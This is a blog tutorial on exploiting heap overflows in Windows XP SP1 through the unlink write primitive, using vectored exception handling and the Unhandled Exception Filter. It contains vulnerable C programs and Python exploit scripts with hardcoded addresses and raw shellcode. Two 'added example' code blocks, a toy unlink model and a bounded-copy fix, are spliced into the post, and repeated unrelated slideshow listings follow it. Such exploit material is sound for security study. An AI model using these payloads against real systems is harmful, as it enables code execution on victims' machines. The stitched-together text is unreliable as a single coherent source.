mr_me's IT security blog
Exploiting, Reversing, Fuzzing, Code Analysis and Web Application Security
Heap Overflows For Humans – 101
mr_me · Sunday, October 24th, 2010
We have talked previously about stack-based buffer overflows and format string vulnerabilities. Now it is time to take it a step further and play with the Windows heap manager!
Unlink() to execute a write 4 primitive
Previously, with stack overflows, we gained control of the execution pointer (EIP) somehow, whether through the exception handler or directly. Today we are going to discuss a series of tried-and-tested techniques that gain control of execution without directly using EIP or SEH. By overwriting a location in memory of our choice with a controlled value, we are able to achieve an arbitrary DWORD overwrite.
If you are unfamiliar with stack-based buffer overflows to an intermediate/advanced level, then it is suggested that you focus on this area first. What we are about to cover has been dead and buried for a while, so if you are looking for newer techniques to exploit the Windows heap manager, don't stick around.
What you will need:
- Windows XP with just SP1 installed.
- A debugger (Olly Debugger, Immunity Debugger, WinDbg etc.).
- A C/C++ compiler (Dev C++, lcc-32, MS Visual C++ 6.0 (if you can still get it)).
- A scripting language of ease (I use Python, maybe you can use Perl).
- A brain (and/or persistence).
- Some knowledge of assembly, C and of how to dig through a debugger.
- HideDbg under Olly Debugger (plugin) or !hidedebug under Immunity Debugger.
- Time.
We are going to focus on the core basics and fundamentals. The techniques presented will most probably be too old to use in the “real world”; however, it must always be remembered that if you want to move forward, you must know the past, and learn from it.
OK, let's begin!
What is the heap and how does it work under XP?
mr_me's IT security blog - 1 / 12 - 10.01.2011
The heap is an area of storage where a process can store data. Each process dynamically allocates and deallocates heap memory based on the requirements of the application, and this memory is globally accessible within the process. It is important to point out that the stack grows towards 0x00000000 and yet the heap grows towards 0xFFFFFFFF. This means that if a process were to call HeapAlloc() twice, the second call would return a pointer that is higher than the first. Therefore any overflow of the first block will overflow into the second block.
Every heap, whether it is the default process heap or a dynamically allocated heap, contains multiple data structures. One of those data structures is an array of 128 LIST_ENTRY structures that keeps track of free blocks. This is known as the FreeLists. Each list entry holds two pointers, and the beginning of this array can be found at offset 0x178 bytes into the heap structure. When a heap is created, two pointers which point to the first free block of memory available for allocation are set at FreeLists[0]. At the address that these two pointers point to (the beginning of the first available block) are two pointers that point back to FreeLists[0].
Let that sink in, and then think about this.
Assuming we have a heap with a base address of 0x00650000 and the first available block is located at 0x00650688, then we can assume the following four addresses:
1. At address 0x00650178 (FreeList[0].Flink) is a pointer with the value of 0x00650688 (our first free block).
2. At address 0x0065017c (FreeList[0].Blink) is a pointer with the value of 0x00650688 (our first free block).
3. At address 0x00650688 (our first free block) is a pointer with the value of 0x00650178 (FreeList[0]).
4. At address 0x0065068c (our first free block) is a pointer with the value of 0x00650178 (FreeList[0]).
When an allocation occurs, the FreeList[0].Flink and FreeList[0].Blink pointers are updated to point to the next free block that will be allocated. Furthermore, the two pointers that point back to the FreeList are moved to the end of the newly allocated block. On every allocation or free, these pointers are updated; therefore, these allocations are tracked in a doubly linked list.
When a heap buffer is overflowed into the heap control data, the updating of these pointers allows the arbitrary DWORD overwrite. An attacker at this point has the opportunity to modify program control data such as function pointers and thus gain control of the process's path of execution.
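To make the unlink write concrete, here is an added example that is not code from the post: a toy model in C of the FreeLists[0] unlink on a 256-byte array that stands in for heap memory. Addresses are offsets from a constructed BASE, and a LIST_ENTRY is two little-endian DWORDs, Flink at +0 and Blink at +4. The model runs the same kind of unbounded copy the post's foo() does, first with input that fits and then with input that overruns into the next free block's Flink/Blink, and shows what the allocator's two stores then do to a pointer the program trusts. It also includes the safe-unlinking check (refuse an entry whose neighbours do not point back at it) that Windows added in XP SP2, one of the heap protections the post's planned SP2/SP3 follow-up refers to. The layout, the names HEAD/CHUNK/FREE/FNPTR/SC and the placeholder pointer value are all constructed for the model.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
/* Toy model of the FreeLists[0] unlink, added for illustration: not code from
 * the post, and it touches no real heap. "Memory" is a 256-byte array addressed
 * as if it lived at BASE; a LIST_ENTRY is two little-endian DWORDs, Flink at +0
 * and Blink at +4. Layout, names and the placeholder pointer are constructed. */
#define BASE       0x01010100u  /* offsets >= 1 from here contain no NUL byte */
#define MEM_SIZE   256u
#define ORIG_FNPTR 0x7C801234u  /* placeholder for a pointer the program trusts */
enum { HEAD = BASE + 0x00,      /* FreeLists[0] */
       CHUNK = BASE + 0x20,     /* allocated 32-byte chunk (the post's h1) */
       FREE = BASE + 0x40,      /* next free block, directly after the chunk */
       FNPTR = BASE + 0x80,     /* function pointer the program later calls */
       SC = BASE + 0xC0 };      /* attacker-supplied data */
static uint8_t mem[MEM_SIZE];
static int in_mem(uint32_t a) {
    return a >= BASE && a - BASE < MEM_SIZE && MEM_SIZE - (a - BASE) >= 4;
}
static uint32_t rd(uint32_t a) {             /* little-endian DWORD read */
    const uint8_t *p = mem + (a - BASE);
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void put_le(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}
static int wr(uint32_t a, uint32_t v) {      /* out of bounds = access violation */
    if (!in_mem(a)) return -1;
    put_le(mem + (a - BASE), v);
    return 0;
}
static void build_list(void) {
    memset(mem, 0, sizeof mem);
    wr(HEAD, FREE); wr(HEAD + 4, FREE);      /* FreeLists[0] <-> free block */
    wr(FREE, HEAD); wr(FREE + 4, HEAD);
    wr(FNPTR, ORIG_FNPTR);
}
/* The program's bug, like strcpy(h1, buf) in heap-veh.c: an unbounded copy into
 * the 32-byte chunk, so bytes 32..39 of src land on FREE's Flink and Blink. */
static size_t strcpy_into_chunk(const char *src) {
    size_t n = strlen(src) + 1, room = MEM_SIZE - (CHUNK - BASE);
    if (n > room) n = room;                  /* keep the model itself in bounds */
    memcpy(mem + (CHUNK - BASE), src, n);
    return n;
}
/* The allocator's two stores when it takes a block off the list (the pair of
 * MOV DWORD PTR instructions the post shows): Flink->Blink = Blink, then
 * Blink->Flink = Flink. With both fields attacker-controlled this is one DWORD
 * written to a chosen address and a mirrored DWORD written to the chosen value. */
static int unlink_entry(uint32_t e) {
    uint32_t flink = rd(e), blink = rd(e + 4);
    if (wr(flink + 4, blink) != 0) return -1;
    if (wr(blink, flink) != 0) return -1;
    return 0;
}
/* Safe unlinking (the check XP SP2 added): refuse an entry whose neighbours do
 * not point back at it. */
static int safe_unlink_entry(uint32_t e) {
    uint32_t flink = rd(e), blink = rd(e + 4);
    if (!in_mem(flink + 4) || !in_mem(blink)) return 1;
    if (rd(flink + 4) != e || rd(blink) != e) return 1;
    return unlink_entry(e);
}
/* Overrun the chunk: 32 filler bytes, then a fake Flink of FNPTR-4 (so Flink+4
 * is the slot to overwrite) and a fake Blink holding the value to plant there.
 * Returns 0 if a NUL byte in either address would have truncated the copy. */
static int overrun_chunk(void) {
    uint8_t payload[41];
    memset(payload, 'A', 32);
    put_le(payload + 32, FNPTR - 4);
    put_le(payload + 36, SC);
    payload[40] = '\0';
    if (strlen((const char *)payload) != 40) return 0;
    strcpy_into_chunk((const char *)payload);
    return 1;
}
/* Input that fits: the block comes off the list and nothing else changes. */
static int scenario_intact(void) {
    build_list();
    strcpy_into_chunk("hello");
    if (unlink_entry(FREE) != 0) return -1;
    return rd(HEAD) == HEAD && rd(HEAD + 4) == HEAD && rd(FNPTR) == ORIG_FNPTR;
}
/* Overrun, then the plain unlink: FNPTR now holds SC, and the mirrored store
 * has put FNPTR-4 into the first DWORD at SC. */
static int scenario_overflow(void) {
    build_list();
    if (!overrun_chunk() || unlink_entry(FREE) != 0) return -1;
    return rd(FNPTR) == SC && rd(SC) == FNPTR - 4;
}
/* Overrun, then the checked unlink: the entry is refused and FNPTR is untouched. */
static int scenario_safe_unlink(void) {
    build_list();
    if (!overrun_chunk()) return -1;
    return safe_unlink_entry(FREE) == 1 && rd(FNPTR) == ORIG_FNPTR;
}
int main(void) {
    printf("intact=%d overflow=%d safe=%d\n", scenario_intact(), scenario_overflow(), scenario_safe_unlink());
    return 0;
}
```

The mirrored store is the reason the post's "what to write" value has to be a writable address itself: in the model the DWORD at SC is overwritten as a side effect of the write to FNPTR, just as the post's PoC ends up writing the list address back onto the stack next to the shellcode pointer. The BASE value is chosen so that none of the model's addresses contain a NUL byte, which is the same constraint the post works around when it leaves the last byte of EAX to the string terminator.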
Exploiting Heap Overflows using Vectored Exception Handling
First, let's begin with our heap-veh.c code:
    #include <windows.h>
    #include <stdio.h>
    #include <string.h>

    DWORD MyExceptionHandler(void);
    int foo(char *buf);

    int main(int argc, char *argv[])
    {
        HMODULE l;
        // extra modules loaded into the process
        l = LoadLibrary("msvcrt.dll");
        l = LoadLibrary("netapi32.dll");
        printf("\n\nHeapoverflow program.\n");
        if(argc != 2)
            return printf("ARGS!");
        foo(argv[1]);
        return 0;
    }

    DWORD MyExceptionHandler(void)
    {
        printf("In exception handler....");
        ExitProcess(1);
        return 0;
    }

    int foo(char *buf)
    {
        HLOCAL h1 = 0, h2 = 0;
        HANDLE hp;

        __try{
            // private heap: 0x1000 bytes initially, 0x10000 bytes maximum
            hp = HeapCreate(0,0x1000,0x10000);
            if(!hp){
                return printf("Failed to create heap.\n");
            }
            h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);

            printf("HEAP: %.8X %.8X\n",h1,&h1);

            // Heap Overflow occurs here:
            strcpy(h1,buf);

            // This second call to HeapAlloc() is when we gain control
            h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
            printf("hello");
        }
        __except(MyExceptionHandler())
        {
            printf("oops...");
        }
        return 0;
    }
From the above code, we can see that there will be exception handling due to the __try block statement. Begin by compiling the code with your favourite compiler under Windows XP SP1.
Run the application on the command line, and notice how, when given more than 260 bytes as the argument, the exception handler kicks in.
Now of course when we run this in the debugger, we gain control of the second
allocation (because freelist[0] is being updated with our attack string from the first
allocation). Look:
MOV DWORD PTR DS:[ECX],EAX
MOV DWORD PTR DS:[EAX+4],ECX
These instructions are saying “make the value at the address in ECX equal to EAX, and make the value at the address in EAX plus 4 equal to ECX”. From this we know we are unlinking (freeing) the first allocated memory block. So essentially it means:
1. EAX (what we write): Blink
2. ECX (location of where to write): Flink
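The root cause in both heap-veh.c and heap-uef.c is the unbounded strcpy(h1, buf) into a 260-byte block. The following is an added example, not code from the post: a bounded replacement for foo() that rejects any argument that does not fit, including its terminating NUL, before anything is copied. calloc stands in for HeapAlloc(hp, HEAP_ZERO_MEMORY, 260) so that it compiles outside Windows; the check itself is the same with the Windows heap API. The names copy_into_block, foo_fixed and boundary_check are this example's own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BLOCK_SIZE 260   /* the size the post allocates with HeapAlloc */

enum copy_status { COPY_OK = 0, COPY_TOO_LONG = 1, COPY_NO_MEM = 2 };

/* Bounded replacement for the strcpy(h1, buf) in foo(): the input must fit in
 * BLOCK_SIZE bytes including the NUL, otherwise nothing is allocated or copied.
 * calloc stands in for HeapAlloc(hp, HEAP_ZERO_MEMORY, BLOCK_SIZE) here.
 * On COPY_OK, *out owns the block and the caller frees it. */
static enum copy_status copy_into_block(const char *src, char **out)
{
    size_t len = strlen(src);
    char *h1;

    *out = NULL;
    if (len >= BLOCK_SIZE)          /* >= : the NUL needs a byte as well */
        return COPY_TOO_LONG;
    h1 = calloc(1, BLOCK_SIZE);
    if (h1 == NULL)
        return COPY_NO_MEM;
    memcpy(h1, src, len + 1);       /* length already known: no scanning copy */
    *out = h1;
    return COPY_OK;
}

/* The fixed foo(): same observable behaviour as the post's version for
 * well-formed input, an error return instead of heap corruption otherwise. */
static int foo_fixed(const char *buf)
{
    char *h1;
    enum copy_status st = copy_into_block(buf, &h1);

    if (st != COPY_OK) {
        fprintf(stderr, "argument rejected (status %d)\n", (int)st);
        return -1;
    }
    printf("copied %u bytes into the block\n", (unsigned)strlen(h1));
    free(h1);
    return 0;
}

/* Boundary check: 259 characters fit, 260 do not, and a 300-byte argument
 * like the ones the post feeds the program is rejected before any copy. */
static int boundary_check(void)
{
    char buf[301];
    char *blk;
    int ok = 1;

    memset(buf, 'A', 259); buf[259] = '\0';
    ok &= copy_into_block(buf, &blk) == COPY_OK && blk != NULL && strlen(blk) == 259;
    free(blk);

    memset(buf, 'A', 260); buf[260] = '\0';
    ok &= copy_into_block(buf, &blk) == COPY_TOO_LONG && blk == NULL;

    memset(buf, 'A', 300); buf[300] = '\0';
    ok &= copy_into_block(buf, &blk) == COPY_TOO_LONG && blk == NULL;
    return ok;
}

int main(int argc, char *argv[])
{
    if (argc != 2)
        return printf("ARGS!\n");
    return foo_fixed(argv[1]) == 0 ? 0 : 1;
}
```

Rejecting rather than truncating is deliberate: a silent truncation with strncpy would also leave the block without a terminator when the input is exactly 260 bytes, which is the off-by-one the boundary check exercises.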
So what is vectored exception handling?
Vectored exception handling was introduced in Windows XP when it was first released, and it stores its exception registration structures on the heap, unlike traditional frame-based exception handling such as SEH, which stores its structures on the stack. This type of exception handler is called before any frame-based exception handling. The following structure depicts the layout:
    struct _VECTORED_EXCEPTION_NODE
    {
        DWORD m_pNextNode;
        DWORD m_pPreviousNode;
        PVOID m_pfnVectoredHandler;
    };
All that you need to know is that m_pNextNode points to the next _VECTORED_EXCEPTION_NODE structure; therefore we must overwrite the pointer to the _VECTORED_EXCEPTION_NODE (m_pNextNode) with our fake pointer. But what do we overwrite it with? Let's take a look at the code that is responsible for dispatching the _VECTORED_EXCEPTION_NODE:
77F7F49E 8B35 1032FC77 MOV ESI,DWORD PTR DS:[77FC3210]
77F7F4A4 EB 0E JMP SHORT ntdll.77F7F4B4
77F7F4A6 8D45 F8 LEA EAX,DWORD PTR SS:[EBP-8]
77F7F4A9 50 PUSH EAX
77F7F4AA FF56 08 CALL DWORD PTR DS:[ESI+8]
So we MOV the pointer to the _VECTORED_EXCEPTION_NODE into ESI and shortly after we call DWORD PTR [ESI+8]. If we set the next pointer of the _VECTORED_EXCEPTION_NODE to a pointer to our shellcode minus 0x08, then we should land very neatly in our buffer.
Where do we find a pointer to our shellcode? Well, there is one on the stack :0) see:
We can see our pointer to our shellcode on the stack. OK, no stress, let's use this hardcoded value 0x0012ff40. Except, remember the call [ESI+8]? Let's make sure we hit right on target for our shellcode, so 0x0012ff40 - 0x08 = 0x0012ff38. Excellent, so ECX is going to be set to 0x0012ff38.
How do we find m_pNextNode (the pointer to the next _VECTORED_EXCEPTION_NODE)? Well, in Olly (or Immunity Debugger) we can pass our exception so far using Shift+F7 and continue through the code. The code will set up for the call to the first _VECTORED_EXCEPTION_NODE and as such will reveal the pointer at:
77F60C2C BF 1032FC77 MOV EDI,ntdll.77FC3210
77F60C31 393D 1032FC77 CMP DWORD PTR DS:[77FC3210],EDI
77F60C37 0F85 48E80100 JNZ ntdll.77F7F485
You can see that the code is moving m_pNextNode (the pointer that we need) into EDI. Excellent, let's set EAX to that value.
So as it stands, we have the following values set:
ECX = 0x77fc3210
EAX = 0x0012ff38
But of course we need our offsets to EAX and ECX, so we just create an MSF pattern and feed it into the application. Here is a quick reminder for your viewing pleasure:
Step 1 – Create an MSF pattern.
Step 2 – Feed it to the target application.
Step 3 – Calculate the offsets by turning on anti-debugging and triggering the exception.
OK, so here is a skeleton PoC exploit:
    import os
    # _vectored_exception_node
    exploit = ("\xcc" * 272)
    # ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04
    # due to second MOV writes to EAX+4 == 0x77fc320c
    exploit += ("\x0c\x32\xfc\x77") # ECX
    # EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38
    exploit += ("\x38\xff\x12") # EAX - we dont need the null byte
    os.system(r'"C:\Documents and Settings\Steve\Desktop\odbg110\OLLYDBG.EXE" heap-veh.exe ' + exploit)
Now at this stage we cannot have shellcode after our ECX value because it contains a null byte; you may remember this from my previous tutorial, Debugging an SEH 0day. This may not always be the case, as in this example we are using a strcpy to store our buffer in the heap.
OK, so at this point we hit our software breakpoints at “\xcc” and can simply replace them with some shellcode. The shellcode must not be more than 272 bytes, as this is the only spot to place our shellcode.
    # _vectored_exception_node
    import os
    import win32api
    # calc.exe shellcode from the original post
    calc = ("\xda\xcb\x2b\xc9\xd9\x74\x24\xf4\x58\xb1\x32\xbb\xfa\xcd" +
            "\x2d\x4a\x83\xe8\xfc\x31\x58\x14\x03\x58\xee\x2f\xd8\xb6" +
            "\xe6\x39\x23\x47\xf6\x59\xad\xa2\xc7\x4b\xc9\xa7\x75\x5c" +
            "\x99\xea\x75\x17\xcf\x1e\x0e\x55\xd8\x11\xa7\xd0\x3e\x1f" +
            "\x38\xd5\xfe\xf3\xfa\x77\x83\x09\x2e\x58\xba\xc1\x23\x99" +
            "\xfb\x3c\xcb\xcb\x54\x4a\x79\xfc\xd1\x0e\x41\xfd\x35\x05" +
            "\xf9\x85\x30\xda\x8d\x3f\x3a\x0b\x3d\x4b\x74\xb3\x36\x13" +
            "\xa5\xc2\x9b\x47\x99\x8d\x90\xbc\x69\x0c\x70\x8d\x92\x3e" +
            "\xbc\x42\xad\x8e\x31\x9a\xe9\x29\xa9\xe9\x01\x4a\x54\xea" +
            "\xd1\x30\x82\x7f\xc4\x93\x41\x27\x2c\x25\x86\xbe\xa7\x29" +
            "\x63\xb4\xe0\x2d\x72\x19\x9b\x4a\xff\x9c\x4c\xdb\xbb\xba" +
            "\x48\x87\x18\xa2\xc9\x6d\xcf\xdb\x0a\xc9\xb0\x79\x40\xf8" +
            "\xa5\xf8\x0b\x97\x38\x88\x31\xde\x3a\x92\x39\x71\x52\xa3" +
            "\xb2\x1e\x25\x3c\x11\x5b\xd9\x76\x38\xca\x71\xdf\xa8\x4e" +
            "\x1c\xe0\x06\x8c\x18\x63\xa3\x6d\xdf\x7b\xc6\x68\xa4\x3b" +
            "\x3a\x01\xb5\xa9\x3c\xb6\xb6\xfb\x5e\x59\x24\x67\xa1\x93")

    exploit = ("\x90" * 5)
    exploit += (calc)
    exploit += ("\xcc" * (272-len(exploit)))
    # ECX pointer to next _VECTORED_EXCEPTION_NODE = 0x77fc3210 - 0x04
    # due to second MOV writes to EAX+4 == 0x77fc320c
    exploit += ("\x0c\x32\xfc\x77") # ECX
    # EAX ptr to shellcode located at 0012ff40 - 0x8 == 0012ff38
    exploit += ("\x38\xff\x12") # EAX - we dont need the null byte
    win32api.WinExec(('heap-veh.exe %s') % exploit, 1)
Exploiting Heap Overflows using the Unhandled Exception Filter
The Unhandled Exception Filter is the last exception handler to be called before an application closes. It is responsible for dispatching the very common message “An unhandled error occurred” when an application suddenly crashes. Up until this point, we have gotten to the stage of controlling EAX and ECX and knowing the offset location of both registers:
    import os
    exploit = ("\xcc" * 272)
    exploit += ("\x41" * 4) # ECX
    exploit += ("\x42" * 4) # EAX
    exploit += ("\xcc" * 272)
    os.system(r'"C:\Documents and Settings\Steve\Desktop\odbg110\OLLYDBG.EXE" heap-uef.exe ' + exploit)
Unlike the previous example, our heap-uef.c file contains no trace of a custom exception handler. This means we are going to exploit the application using Microsoft's default Unhandled Exception Filter. Below is the heap-uef.c file:
    #include <stdio.h>
    #include <windows.h>
    #include <string.h>

    int foo(char *buf);
    int main(int argc, char *argv[])
    {
        HMODULE l;
        // extra modules loaded into the process
        l = LoadLibrary("msvcrt.dll");
        l = LoadLibrary("netapi32.dll");
        printf("\n\nHeapoverflow program.\n");
        if(argc != 2)
            return printf("ARGS!");
        foo(argv[1]);
        return 0;
    }

    int foo(char *buf)
    {
        HLOCAL h1 = 0, h2 = 0;
        HANDLE hp;

        // private heap: 0x1000 bytes initially, 0x10000 bytes maximum
        hp = HeapCreate(0,0x1000,0x10000);
        if(!hp)
            return printf("Failed to create heap.\n");
        h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
        printf("HEAP: %.8X %.8X\n",h1,&h1);

        // Heap Overflow occurs here:
        strcpy(h1,buf);

        // We gain control of this second call to HeapAlloc
        h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
        printf("hello");
        return 0;
    }
When debugging this type of overflow, it's important to turn anti-debugging on within Olly or Immunity Debugger so that our exception filter is called and the offsets are at the correct location. OK, so first of all, we must find where we are going to write our DWORD to. This would be the pointer to the Unhandled Exception Filter. This can be found by looking at the code at SetUnhandledExceptionFilter().
It can be seen that a MOV instruction uses a pointer to UnhandledExceptionFilter (0x77ed73b4):
So at this point, we can safely say that ECX will contain the value 0x77c3bbad. But now what are we going to write? Let's take a look at what happens when the UnhandledExceptionFilter is called:
77E93114 A1 B473ED77 MOV EAX,DWORD PTR DS:[77ED73B4]
77E93119 3BC6 CMP EAX,ESI
77E9311B 74 15 JE SHORT kernel32.77E93132
77E9311D 57 PUSH EDI
77E9311E FFD0 CALL EAX
Basically, the pointer to UnhandledExceptionFilter() is loaded into EAX, then a PUSH EDI and a CALL EAX execute. Similar to vectored exception handling (except the complete opposite), we can overwrite the pointer's value. This pointer will then point to our shellcode, or to an instruction that will get us back to our shellcode.
If we take a look at EDI, we will notice, 0x78 bytes in, a pointer to the bottom of our payload (8 bytes off the bottom of our payload).
So if we simply call this pointer, we will be executing our shellcode. Therefore we need an instruction at EAX such as:
call dword ptr ds:[edi+74]
This instruction is easily found in many MS modules under XP SP1.
So then let's fill in these values into our PoC and see where we land:
    import os
    exploit = ("\xcc" * 272)
    exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
    exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
    exploit += ("\xcc" * 272)
    os.system(r'"C:\Documents and Settings\Steve\Desktop\odbg110\OLLYDBG.EXE" heap-uef.exe ' + exploit)
Of course, we simply calculate the offset to this part of the shellcode, insert our JMP instruction and insert our shellcode:
    import os

    calc = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"
            "\x44\x80\xc2\x77" # address to WinExec()
            "\xFF\xD1\x90\x90")

    exploit = ("\x44" * 264)
    exploit += "\xeb\x14" # our JMP (over the junk and into nops)
    exploit += ("\x44" * 6)
    exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74]
    exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter()
    exploit += ("\x90" * 21)
    exploit += calc

    os.system('heap-uef.exe ' + exploit)
Boom !
Conclusion:
We have demonstrated two techniques for exploiting unlink() in its most primitive form under Windows XP SP1. Other techniques can also apply, such as RtlEnterCriticalSection or TEB exception handler exploitation, in the same situation. Following on from here, we will present exploiting unlink() (HeapAlloc/HeapFree) under Windows XP SP2 and SP3 and bypassing the Windows protections for the heap.
PoCs:
- http://www.exploit-db.com/exploits/12240/
- http://www.exploit-db.com/exploits/15957/
References:
1. The Shellcoder's Handbook (Chris Anley, John Heasman, FX, Gerardo Richarte)
2. David Litchfield (http://www.blackhat.com/presentations/win-usa-04/bh-win-04-litchfield/bh-win-04-litchfield.ppt)
This entry was posted on Sunday, October 24th, 2010 at 2:30 pm and is filed under exploit development.
THE SOCIAL STEM- #1 TRUSTED  DIGITAL MARKETING COMPANYTHE SOCIAL STEM- #1 TRUSTED  DIGITAL MARKETING COMPANY
THE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANY
thesocialstem05
 
Nomad Internet: Leading Internet Provider for Rural Areas in the USA
Nomad Internet: Leading Internet Provider for Rural Areas in the USANomad Internet: Leading Internet Provider for Rural Areas in the USA
Nomad Internet: Leading Internet Provider for Rural Areas in the USA
Nomad Internet
 
Internet Celebrities and Purposeful Content Creation
Internet Celebrities and Purposeful Content CreationInternet Celebrities and Purposeful Content Creation
Internet Celebrities and Purposeful Content Creation
silnan
 
Pros and Cons of Investing in Stock Market ETFs.docx
Pros and Cons of Investing in Stock Market ETFs.docxPros and Cons of Investing in Stock Market ETFs.docx
Pros and Cons of Investing in Stock Market ETFs.docx
SFC Today
 
DataVinci-Google Analytics-Consulting-Services
DataVinci-Google Analytics-Consulting-ServicesDataVinci-Google Analytics-Consulting-Services
DataVinci-Google Analytics-Consulting-Services
Data Vinci
 
INSET Powerpoint Presentation Science Session 5.pptx.pdf
INSET Powerpoint Presentation Science Session 5.pptx.pdfINSET Powerpoint Presentation Science Session 5.pptx.pdf
INSET Powerpoint Presentation Science Session 5.pptx.pdf
MishaWilliams2
 
Introduction-to-Future-Technologies (2).pptx
Introduction-to-Future-Technologies (2).pptxIntroduction-to-Future-Technologies (2).pptx
Introduction-to-Future-Technologies (2).pptx
khushalsethi9
 
Epidemiology of viral hepatitis infection .pptx
Epidemiology of  viral hepatitis infection .pptxEpidemiology of  viral hepatitis infection .pptx
Epidemiology of viral hepatitis infection .pptx
ArunaDevi561806
 
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdfADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
ifraghaffar125
 
WTF is Food Journalism? An introduction to Food Media
WTF is Food Journalism? An introduction to Food MediaWTF is Food Journalism? An introduction to Food Media
WTF is Food Journalism? An introduction to Food Media
Damian Radcliffe
 
netflix-inspired intro for your latest presentation
netflix-inspired intro for your latest presentationnetflix-inspired intro for your latest presentation
netflix-inspired intro for your latest presentation
ArunRamkumar5
 
Network Security Firewall(Basics of Firewall)
Network Security Firewall(Basics of Firewall)Network Security Firewall(Basics of Firewall)
Network Security Firewall(Basics of Firewall)
sivaraman163206
 
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
Beshoelwy
 
prestige-tranquil details of house and rooms
prestige-tranquil details of house and roomsprestige-tranquil details of house and rooms
prestige-tranquil details of house and rooms
Madhavi443720
 
Lublin triangle + Moldova 2024. research pdf
Lublin triangle + Moldova 2024. research pdfLublin triangle + Moldova 2024. research pdf
Lublin triangle + Moldova 2024. research pdf
ssuser54595a
 
PSP3 employability assessment form .docx
PSP3 employability assessment form .docxPSP3 employability assessment form .docx
PSP3 employability assessment form .docx
blessfkombo
 

Recently uploaded (20)

The Money Wave 2024 Review_ Is It the Key to Financial Success.pdf
The Money Wave 2024 Review_ Is It the Key to Financial Success.pdfThe Money Wave 2024 Review_ Is It the Key to Financial Success.pdf
The Money Wave 2024 Review_ Is It the Key to Financial Success.pdf
 
Introduction To Disaster Recovery IT Services
Introduction To Disaster Recovery IT ServicesIntroduction To Disaster Recovery IT Services
Introduction To Disaster Recovery IT Services
 
Presentación1InteligenciaArtificial.pptx
Presentación1InteligenciaArtificial.pptxPresentación1InteligenciaArtificial.pptx
Presentación1InteligenciaArtificial.pptx
 
How Can Microsoft Office 365 Improve Your Productivity?
How Can Microsoft Office 365 Improve Your Productivity?How Can Microsoft Office 365 Improve Your Productivity?
How Can Microsoft Office 365 Improve Your Productivity?
 
THE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANY
THE SOCIAL STEM- #1 TRUSTED  DIGITAL MARKETING COMPANYTHE SOCIAL STEM- #1 TRUSTED  DIGITAL MARKETING COMPANY
THE SOCIAL STEM- #1 TRUSTED DIGITAL MARKETING COMPANY
 
Nomad Internet: Leading Internet Provider for Rural Areas in the USA
Nomad Internet: Leading Internet Provider for Rural Areas in the USANomad Internet: Leading Internet Provider for Rural Areas in the USA
Nomad Internet: Leading Internet Provider for Rural Areas in the USA
 
Internet Celebrities and Purposeful Content Creation
Internet Celebrities and Purposeful Content CreationInternet Celebrities and Purposeful Content Creation
Internet Celebrities and Purposeful Content Creation
 
Pros and Cons of Investing in Stock Market ETFs.docx
Pros and Cons of Investing in Stock Market ETFs.docxPros and Cons of Investing in Stock Market ETFs.docx
Pros and Cons of Investing in Stock Market ETFs.docx
 
DataVinci-Google Analytics-Consulting-Services
DataVinci-Google Analytics-Consulting-ServicesDataVinci-Google Analytics-Consulting-Services
DataVinci-Google Analytics-Consulting-Services
 
INSET Powerpoint Presentation Science Session 5.pptx.pdf
INSET Powerpoint Presentation Science Session 5.pptx.pdfINSET Powerpoint Presentation Science Session 5.pptx.pdf
INSET Powerpoint Presentation Science Session 5.pptx.pdf
 
Introduction-to-Future-Technologies (2).pptx
Introduction-to-Future-Technologies (2).pptxIntroduction-to-Future-Technologies (2).pptx
Introduction-to-Future-Technologies (2).pptx
 
Epidemiology of viral hepatitis infection .pptx
Epidemiology of  viral hepatitis infection .pptxEpidemiology of  viral hepatitis infection .pptx
Epidemiology of viral hepatitis infection .pptx
 
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdfADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
ADEGUNADEGUNADEGUNADEGUNADEGUNADEGUNADEGUN.pdf
 
WTF is Food Journalism? An introduction to Food Media
WTF is Food Journalism? An introduction to Food MediaWTF is Food Journalism? An introduction to Food Media
WTF is Food Journalism? An introduction to Food Media
 
netflix-inspired intro for your latest presentation
netflix-inspired intro for your latest presentationnetflix-inspired intro for your latest presentation
netflix-inspired intro for your latest presentation
 
Network Security Firewall(Basics of Firewall)
Network Security Firewall(Basics of Firewall)Network Security Firewall(Basics of Firewall)
Network Security Firewall(Basics of Firewall)
 
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
Module 16 Incineration of Healthcare Waste and the Stockholm Convention Guide...
